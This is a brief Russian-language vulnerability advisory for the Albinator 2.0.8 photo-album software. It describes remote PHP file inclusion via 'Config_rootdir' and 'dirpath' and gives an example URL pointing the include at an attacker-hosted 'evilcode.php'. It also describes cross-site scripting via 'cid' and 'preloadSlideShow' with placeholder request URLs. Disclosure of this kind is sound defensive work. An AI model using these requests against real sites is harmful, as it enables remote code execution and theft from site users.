Программа: Albinator 2.0.8, возможно более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение и
выполнить произвольный PHP сценарий на целевой системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "Config_rootdir" в сценариях "eday.php", "eshow.php" и "forgot.php", и
параметре "dirpath" в сценариях "gc.php" и "integration.inc.php".

Пример:

http://victim/eshow.php?Config_rootdir=http://evilcode.php

2. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "cid" в сценарии "dlisting.php" и параметре "preloadSlideShow" в
сценарии "showpic.php". Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольный код сценария в браузере жертвы в
контексте безопасности уязвимого сайта.

Пример:

/dlisting.php?cid=1[XSS]

/showpic.php?aid=21&uuid=175&pid=172&slide_show= 1&slide_show_secs=0&preloadSlideShow=[XSS]

 



Оставить мнение